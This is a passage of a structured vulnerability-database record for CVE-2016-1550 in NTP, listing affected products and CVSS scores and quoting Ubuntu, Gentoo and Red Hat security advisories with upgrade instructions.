"trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "prime infrastructure standalone plug and play gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "content security appliance updater servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.70" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.5" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7.2" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "p8", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.1.0" }, { "model": "4.2.8p5", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0" }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4.2.8p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.2.0" }, { "model": "prime access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "scos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.9.0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "4.2.7p111", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security privileged identity manager fixpack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.0.28" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.6" }, { "model": "support central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.6" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified computing system e-series blade server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "enterprise linux hpc node eus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7.2" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": "4.3.92" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.11" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.10" }, { "model": "p74", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.4.0" }, { "model": "prime service catalog virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.26" }, { "model": "4.2.8p2", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.12" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.80" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "wap371 wireless access point", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "p1", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.90" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.5.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "management heartbeat server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "series ip phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.1.0" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1210" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "p6", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.3.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4.2.8p1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4.2.8p7", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4.2.7p366", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4.2.8p3-rc1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sentinel", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "p7", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "4.2.0.a", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "nac server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.3" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.1.2" }, { "model": "p5", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "BID", "id": "88261" }, { "db": "JVNDB", "id": "JVNDB-2016-006651" }, { "db": "NVD", "id": "CVE-2016-1550" }, { "db": "CNNVD", "id": "CNNVD-201604-605" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-1550" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Siemens reported these vulnerabilities to CISA.", "sources": [ { "db": "CNNVD", "id": "CNNVD-201604-605" } ], "trust": 0.6 }, "cve": "CVE-2016-1550", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2016-1550", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitabilityScore": 3.9, "impactScore": 1.4, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.3, "baseSeverity": "Medium", "confidentialityImpact": "Low", "exploitabilityScore": null, "id": "CVE-2016-1550", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-1550", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201604-605", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2016-1550", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-1550" }, { "db": "JVNDB", "id": "JVNDB-2016-006651" }, { "db": "NVD", "id": "CVE-2016-1550" }, { "db": "CNNVD", "id": "CNNVD-201604-605" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An exploitable vulnerability exists in the message authentication functionality of libntp in ntp 4.2.8p4 and NTPSec a5fb34b9cc89b92a8fef2f459004865c93bb7f92. An attacker can send a series of crafted messages to attempt to recover the message digest key. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP is prone to a local security-bypass vulnerability. \nAn attacker can exploit this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. \nVersions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable. ==========================================================================\nUbuntu Security Notice USN-3096-1\nOctober 05, 2016\n\nntp vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. (CVE-2015-7973)\n\nMatt Street discovered that NTP incorrectly verified peer associations of\nsymmetric keys. (CVE-2015-7974)\n\nJonathan Gardner discovered that the NTP ntpq utility incorrectly handled\nmemory. An attacker could possibly use this issue to cause ntpq to crash,\nresulting in a denial of service. This issue only affected Ubuntu 16.04\nLTS. (CVE-2015-7975)\n\nJonathan Gardner discovered that the NTP ntpq utility incorrectly handled\ndangerous characters in filenames. An attacker could possibly use this\nissue to overwrite arbitrary files. (CVE-2015-7976)\n\nStephen Gray discovered that NTP incorrectly handled large restrict lists. (CVE-2015-7977, CVE-2015-7978)\n\nAanchal Malhotra discovered that NTP incorrectly handled authenticated\nbroadcast mode. (CVE-2015-7979)\n\nJonathan Gardner discovered that NTP incorrectly handled origin timestamp\nchecks. A remote attacker could use this issue to spoof peer servers. \n(CVE-2015-8138)\n\nJonathan Gardner discovered that the NTP ntpq utility did not properly\nhandle certain incorrect values. An attacker could possibly use this issue\nto cause ntpq to hang, resulting in a denial of service. (CVE-2015-8158)\n\nIt was discovered that the NTP cronjob incorrectly cleaned up the\nstatistics directory. A local attacker could possibly use this to escalate\nprivileges. (CVE-2016-0727)\n\nStephen Gray and Matthew Van Gundy discovered that NTP incorrectly\nvalidated crypto-NAKs. A remote attacker could possibly use this issue to\nprevent clients from synchronizing. A remote attacker could\npossibly use this issue to prevent clients from synchronizing. \n(CVE-2016-1548)\n\nMatthew Van Gundy, Stephen Gray and Loganaden Velvindron discovered that\nNTP incorrectly handled message authentication. (CVE-2016-1550)\n\nYihan Lian discovered that NTP incorrectly handled duplicate IPs on\nunconfig directives. A remote attacker could possibly use this issue to cause a denial\nof service. A remote attacker could possibly use this issue to\ncause a denial of service. A remote attacker could possibly use this issue to\ncause a denial of service. (CVE-2016-4956)\n\nIn the default installation, attackers would be isolated by the NTP\nAppArmor profile. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n ntp 1:4.2.8p4+dfsg-3ubuntu5.3\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.10\n\nUbuntu 12.04 LTS:\n ntp 1:4.2.6.p3+dfsg-1ubuntu3.11\n\nIn general, a standard system update will make all the necessary changes. 6.7) - i386, noarch, ppc64, s390x, x86_64\n\n3. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-15\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: NTP: Multiple vulnerabilities\n Date: July 20, 2016\n Bugs: #563774, #572452, #581528, #584954\n ID: 201607-15\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to Denial of Service. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8_p8 \u003e= 4.2.8_p8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-7691\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691\n[ 2 ] CVE-2015-7692\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692\n[ 3 ] CVE-2015-7701\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701\n[ 4 ] CVE-2015-7702\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702\n[ 5 ] CVE-2015-7703\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703\n[ 6 ] CVE-2015-7704\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704\n[ 7 ] CVE-2015-7705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705\n[ 8 ] CVE-2015-7848\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848\n[ 9 ] CVE-2015-7849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849\n[ 10 ] CVE-2015-7850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850\n[ 11 ] CVE-2015-7851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851\n[ 12 ] CVE-2015-7852\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852\n[ 13 ] CVE-2015-7853\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853\n[ 14 ] CVE-2015-7854\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854\n[ 15 ] CVE-2015-7855\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855\n[ 16 ] CVE-2015-7871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871\n[ 17 ] CVE-2015-7973\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973\n[ 18 ] CVE-2015-7974\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974\n[ 19 ] CVE-2015-7975\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975\n[ 20 ] CVE-2015-7976\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976\n[ 21 ] CVE-2015-7977\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977\n[ 22 ] CVE-2015-7978\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978\n[ 23 ] CVE-2015-7979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979\n[ 24 ] CVE-2015-8138\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138\n[ 25 ] CVE-2015-8139\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139\n[ 26 ] CVE-2015-8140\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140\n[ 27 ] CVE-2015-8158\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158\n[ 28 ] CVE-2016-1547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547\n[ 29 ] CVE-2016-1548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548\n[ 30 ] CVE-2016-1549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549\n[ 31 ] CVE-2016-1550\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550\n[ 32 ] CVE-2016-1551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551\n[ 33 ] CVE-2016-2516\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516\n[ 34 ] CVE-2016-2517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517\n[ 35 ] CVE-2016-2518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518\n[ 36 ] CVE-2016-2519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519\n[ 37 ] CVE-2016-4953\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953\n[ 38 ] CVE-2016-4954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954\n[ 39 ] CVE-2016-4955\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955\n[ 40 ] CVE-2016-4956\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956\n[ 41 ] CVE-2016-4957\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-15\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: ntp security update\nAdvisory ID: RHSA-2016:1141-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2016:1141\nIssue date: 2016-05-31\nCVE Names: CVE-2015-7979 CVE-2016-1547 CVE-2016-1548 \n CVE-2016-1550 CVE-2016-2518 \n=====================================================================\n\n1. Summary:\n\nAn update for ntp is now available for Red Hat Enterprise Linux 6 and Red\nHat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. Description:\n\nThe Network Time Protocol 